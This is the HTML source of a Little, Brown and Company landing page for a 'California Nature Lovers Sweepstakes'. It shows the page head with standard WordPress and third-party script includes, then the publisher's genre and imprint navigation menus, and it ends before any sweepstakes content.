<!DOCTYPE html>
<html lang="en-US">
	<head>
		<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="google-site-verification" content="85wAGAWAuJVKY63Av9XQL_d8G9S3oJQ9FIKRL_p_NnA" />
<meta name="msvalidate.01" content="0051B8D8511A2B9F4DE35FC989DC79B8" />
<meta name="p:domain_verify" content="d17b1f4fbc23ea8e105438f14592909f"/>
<link rel="profile" href="http://gmpg.org/xfn/11">
<title>California Nature Lovers Sweepstakes | Little, Brown and Company</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//static.srcspot.com' />
<link rel='dns-prefetch' href='//launcher.zo.la' />
<link rel='dns-prefetch' href='//platform.twitter.com' />
<link rel='dns-prefetch' href='//unpkg.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Feed" href="https://www.littlebrown.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Comments Feed" href="https://www.littlebrown.com/comments/feed/" />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.littlebrown.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.3"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.littlebrown.com/wp-includes/css/dist/block-library/style.min.css?ver=5.9.3' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mediaelement-css'  href='https://www.littlebrown.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://www.littlebrown.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.9.3' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='hachette-site-css-css'  href='https://www.littlebrown.com/wp-content/themes/hachette/static/css/hachette-site.min.css?ver=ad13182eaaf9298a8ae4' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-all-domains-css-css'  href='https://www.littlebrown.com/wp-content/themes/hachette-book-group/client/build/css/lens-hbg-all-domains.css?ver=beaa4715269b9f8f4374' type='text/css' media='all' />
<link rel='stylesheet' id='hachette-lens-css-css'  href='https://www.littlebrown.com/wp-content/themes/hachette-book-group/client/build/css/lens-little-brown-and-company.css?ver=beaa4715269b9f8f4374' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-google-fonts-source-sans-css'  href='https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C600%2C700&#038;ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-leaflet-css-css'  href='https://unpkg.com/leaflet@1.7.1/dist/leaflet.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://www.littlebrown.com/wp-content/mu-plugins/jetpack-10.8/css/jetpack.css?ver=10.8' type='text/css' media='all' />
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://static.srcspot.com/libs/neille.js?ver=0.1.0' id='mimecast-script-js'></script>
<script type='text/javascript' src='https://launcher.zo.la/assets/zbwidget-launcher-0.1.0.js?ver=0.1.0' id='zola-widget-launcher-js'></script>
<script type='text/javascript' src='https://unpkg.com/leaflet@1.7.1/dist/leaflet.js?ver=1.0' id='hachette-leaflet-js-js'></script>
<link rel="https://api.w.org/" href="https://www.littlebrown.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.littlebrown.com/wp-json/wp/v2/landing-page/1210696" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.littlebrown.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.littlebrown.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.9.3" />
<link rel="canonical" href="https://www.littlebrown.com/landing-page/california-nature-lovers-sweepstakes/" />
<link rel='shortlink' href='https://www.littlebrown.com/?p=1210696' />
<link rel="alternate" type="application/json+oembed" href="https://www.littlebrown.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.littlebrown.com%2Flanding-page%2Fcalifornia-nature-lovers-sweepstakes%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.littlebrown.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.littlebrown.com%2Flanding-page%2Fcalifornia-nature-lovers-sweepstakes%2F&#038;format=xml" />
<style type='text/css'>img#wpstats{display:none}</style>
				<script>
				window.dataLayer = window.dataLayer || [];
				window.dataLayer.push(
					{"imprint":"hachette","genre":"","genreSecondary":"","genreTertiary":"","format":""}				);
			</script>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="California Nature Lovers Sweepstakes" />
<meta property="og:url" content="https://www.littlebrown.com/landing-page/california-nature-lovers-sweepstakes/" />
<meta property="og:description" content="Visit the post for more." />
<meta property="article:published_time" content="2022-04-11T14:57:47+00:00" />
<meta property="article:modified_time" content="2022-04-11T14:57:47+00:00" />
<meta property="og:site_name" content="Little, Brown and Company" />
<meta property="og:image" content="https://www.littlebrown.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=512%2C512" />
<meta property="og:image:width" content="512" />
<meta property="og:image:height" content="512" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:text:title" content="California Nature Lovers Sweepstakes" />
<meta name="twitter:image" content="https://www.littlebrown.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=240%2C240" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Visit the post for more." />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://www.littlebrown.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://www.littlebrown.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://www.littlebrown.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://www.littlebrown.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=270%2C270" />
		<style type="text/css" id="wp-custom-css">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</style>
			</head>
	<body class="landing-page-template-default single single-landing-page postid-1210696 littlebrown">
				<div id="page" class="site single-post page imprint">
			<header class="site-header">
	<nav class="site-header__nav swappable" data-swap-location=".imprint-header__menu" data-swap-method="append" data-swap-max="m">
		<a href="https://www.hachettebookgroup.com/">
			<div class="site-header__desktop-logo imprint__global-logo ">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-2322255994  desc-hachette-logo-1953255439">
	<title id="title-hachette-logo-2322255994">Hachette Logo</title>
	<desc id="desc-hachette-logo-1953255439">Hachette Logo</desc>
	<polygon role="presentation" class="logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
	<polygon role="presentation" class="logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
			</div>
		</a>
		<div class="menu-imprint-nav-container"><ul id="menu-hachette-primary-menu" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genres/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Genres">Genres</a><span id="expand-site-header__sub-menu-1999841697" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1999841697" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1999841697" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-584712352  desc-arrow-1703463806">
	<title id="titlet-arrow-584712352">Arrow Icon</title>
	<desc id="desc-arrow-1703463806">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1999841697" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1999841697"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/childrens-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Children&#039;s Books">Children&#039;s Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/cooking/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Cooking">Cooking</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/fiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Fiction">Fiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/mind-body-spirit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mind, Body, Spirit">Mind, Body, Spirit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/mystery-thriller/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mystery &amp; Thriller">Mystery &amp; Thriller</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/nonfiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Nonfiction">Nonfiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Romance">Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/sci-fi-fantasy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Sci-Fi &amp; Fantasy">Sci-Fi &amp; Fantasy</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/teen-young-adult/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Teen &amp; Young Adult">Teen &amp; Young Adult</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/genre-category/travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Travel">Travel</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Authors">Authors</a><span id="expand-site-header__sub-menu-1677312326" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1677312326" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1677312326" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3693195690  desc-arrow-632559084">
	<title id="titlet-arrow-3693195690">Arrow Icon</title>
	<desc id="desc-arrow-632559084">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1677312326" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1677312326"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Our Authors">Our Authors</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-events/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Events">Author Events</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/imprints/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-1177549165" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1177549165" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1177549165" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-720223652  desc-arrow-3046064520">
	<title id="titlet-arrow-720223652">Arrow Icon</title>
	<desc id="desc-arrow-3046064520">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1177549165" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1177549165"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Grand Central Publishing">Grand Central Publishing</a><span id="expand-site-header__sub-menu-481675300" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-481675300" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-481675300" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2154299847  desc-arrow-3850752194">
	<title id="titlet-arrow-2154299847">Arrow Icon</title>
	<desc id="desc-arrow-3850752194">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-481675300" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-481675300"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/balance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Balance">Balance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/forever/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Forever / Forever Yours">Forever / Forever Yours</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/legacy-lit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Legacy Lit">Legacy Lit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/twelve/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Twelve Books">Twelve Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/orbit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit Publishing">Orbit Publishing</a><span id="expand-site-header__sub-menu-148144924" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-148144924" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-148144924" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3747723822  desc-arrow-2683001973">
	<title id="titlet-arrow-3747723822">Arrow Icon</title>
	<desc id="desc-arrow-2683001973">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-148144924" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-148144924"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/orbit/page/orbit-catalog/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit">Orbit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/redhook/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Redhook">Redhook</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Audio">Hachette Audio</a><span id="expand-site-header__sub-menu-1730944405" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1730944405" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1730944405" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3293562539  desc-arrow-619008783">
	<title id="titlet-arrow-3293562539">Arrow Icon</title>
	<desc id="desc-arrow-619008783">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1730944405" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1730944405"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/wattpad/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wattpad">Wattpad</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Nashville">Hachette Nashville</a><span id="expand-site-header__sub-menu-1546709184" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1546709184" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1546709184" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-119756705  desc-arrow-3273438731">
	<title id="titlet-arrow-119756705">Arrow Icon</title>
	<desc id="desc-arrow-3273438731">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1546709184" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1546709184"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/center-street/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Center Street">Center Street</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/faithwords/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="FaithWords">FaithWords</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/worthy-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Worthy Books">Worthy Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown and Company">Little, Brown and Company</a><span id="expand-site-header__sub-menu-1058403321" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1058403321" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1058403321" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-36467048  desc-arrow-2285173650">
	<title id="titlet-arrow-36467048">Arrow Icon</title>
	<desc id="desc-arrow-2285173650">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1058403321" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1058403321"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/back-bay-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Back Bay Books">Back Bay Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/little-brown-spark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown Spark">Little, Brown Spark</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/mulholland-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mulholland Books">Mulholland Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/voracious/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Voracious">Voracious</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown Books for Young Readers">Little, Brown Books for Young Readers</a><span id="expand-site-header__sub-menu-1650539850" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1650539850" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1650539850" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3876657961  desc-arrow-2264045983">
	<title id="titlet-arrow-3876657961">Arrow Icon</title>
	<desc id="desc-arrow-2264045983">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1650539850" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1650539850"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/christy-ottaviano-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Christy Ottaviano Books">Christy Ottaviano Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/jimmy-patterson/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="JIMMY Patterson">JIMMY Patterson</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/lb-kids/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="LB Kids">LB Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/poppy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Poppy">Poppy</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Perseus">Perseus</a><span id="expand-site-header__sub-menu-340329458" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-340329458" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-340329458" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-652581830  desc-arrow-2704346052">
	<title id="titlet-arrow-652581830">Arrow Icon</title>
	<desc id="desc-arrow-2704346052">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-340329458" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-340329458"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Avalon Travel">Avalon Travel</a><span id="expand-site-header__sub-menu-1881809800" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1881809800" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1881809800" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-391392892  desc-arrow-3730067257">
	<title id="titlet-arrow-391392892">Arrow Icon</title>
	<desc id="desc-arrow-3730067257">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
